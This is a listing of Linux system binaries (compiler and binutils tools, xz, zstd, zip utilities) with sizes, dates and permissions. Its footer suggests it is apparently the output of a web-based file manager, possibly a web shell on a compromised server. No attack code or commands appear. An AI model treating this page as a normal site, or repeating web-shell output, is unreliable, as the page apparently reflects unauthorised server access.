x86_64-linux-gnu-gcov-dump
251.836 KB
April 22 2025 11:28:20
root
0755
x86_64-linux-gnu-gcov-dump-11
251.836 KB
April 22 2025 11:28:20
root
0755
x86_64-linux-gnu-gcov-tool
275.93 KB
April 22 2025 11:28:20
root
0755
x86_64-linux-gnu-gcov-tool-11
275.93 KB
April 22 2025 11:28:20
root
0755
x86_64-linux-gnu-gold
3.04 MB
December 03 2025 11:08:01
root
0755
x86_64-linux-gnu-gprof
111.789 KB
December 03 2025 11:08:01
root
0755
x86_64-linux-gnu-ld
1.66 MB
December 03 2025 11:08:01
root
0755
x86_64-linux-gnu-ld.bfd
1.66 MB
December 03 2025 11:08:01
root
0755
x86_64-linux-gnu-ld.gold
3.04 MB
December 03 2025 11:08:01
root
0755
x86_64-linux-gnu-lto-dump-11
23.73 MB
April 22 2025 11:28:20
root
0755
x86_64-linux-gnu-nm
43.625 KB
December 03 2025 11:08:01
root
0755
x86_64-linux-gnu-objcopy
162.539 KB
December 03 2025 11:08:01
root
0755
x86_64-linux-gnu-objdump
365.125 KB
December 03 2025 11:08:01
root
0755
x86_64-linux-gnu-pkg-config
2.183 KB
March 25 2022 12:22:42
root
0755
x86_64-linux-gnu-ranlib
54.484 KB
December 03 2025 11:08:01
root
0755
x86_64-linux-gnu-readelf
758.438 KB
December 03 2025 11:08:01
root
0755
x86_64-linux-gnu-size
30.453 KB
December 03 2025 11:08:01
root
0755
x86_64-linux-gnu-strings
30.609 KB
December 03 2025 11:08:01
root
0755
x86_64-linux-gnu-strip
162.57 KB
December 03 2025 11:08:01
root
0755
x86_64-pc-linux-gnu-pkg-config
50.281 KB
March 25 2022 12:22:42
root
0755
xargs
62.414 KB
March 23 2022 9:52:12
root
0755
xauth
54.961 KB
March 25 2022 5:53:50
root
0755
xdg-user-dir
0.229 KB
March 25 2022 5:54:00
root
0755
xdg-user-dirs-update
26.227 KB
March 25 2022 5:54:00
root
0755
xgettext
297.008 KB
March 25 2022 6:31:07
root
0755
xsubpp
5.046 KB
July 26 2025 1:26:40
root
0755
xxd
18.281 KB
April 02 2025 8:39:01
root
0755
xz
82.523 KB
April 08 2022 8:51:38
root
0755
xzcat
82.523 KB
April 08 2022 8:51:38
root
0755
xzcmp
6.858 KB
April 08 2022 8:51:38
root
0755
xzdiff
6.858 KB
April 08 2022 8:51:38
root
0755
xzegrep
5.874 KB
April 08 2022 8:51:38
root
0755
xzfgrep
5.874 KB
April 08 2022 8:51:38
root
0755
xzgrep
5.874 KB
April 08 2022 8:51:38
root
0755
xzless
1.757 KB
April 08 2022 8:51:38
root
0755
xzmore
2.111 KB
April 08 2022 8:51:38
root
0755
yes
30.383 KB
February 08 2024 11:46:39
root
0755
ypdomainname
22.227 KB
March 23 2022 9:57:59
root
0755
zcat
1.938 KB
September 05 2022 9:33:59
root
0755
zcmp
1.639 KB
September 05 2022 9:33:59
root
0755
zdiff
5.76 KB
September 05 2022 9:33:59
root
0755
zdump
26.211 KB
September 17 2025 11:26:08
root
0755
zegrep
0.028 KB
September 05 2022 9:33:59
root
0755
zfgrep
0.028 KB
September 05 2022 9:33:59
root
0755
zforce
2.032 KB
September 05 2022 9:33:59
root
0755
zgrep
7.913 KB
September 05 2022 9:33:59
root
0755
zipdetails
58.657 KB
July 26 2025 1:26:40
root
0755
zipgrep
2.89 KB
February 01 2024 11:52:55
root
0755
zipinfo
170.422 KB
February 01 2024 11:52:55
root
0755
zless
2.154 KB
September 05 2022 9:33:59
root
0755
zmore
1.799 KB
September 05 2022 9:33:59
root
0755
znew
4.47 KB
September 05 2022 9:33:59
root
0755
zstd
854.586 KB
March 25 2022 12:15:58
root
0755
zstdcat
854.586 KB
March 25 2022 12:15:58
root
0755
zstdgrep
3.778 KB
March 25 2022 12:15:58
root
0755
zstdless
0.029 KB
March 25 2022 12:15:58
root
0755
zstdmt
854.586 KB
March 25 2022 12:15:58
root
0755
2017 © MaVieta | D704T team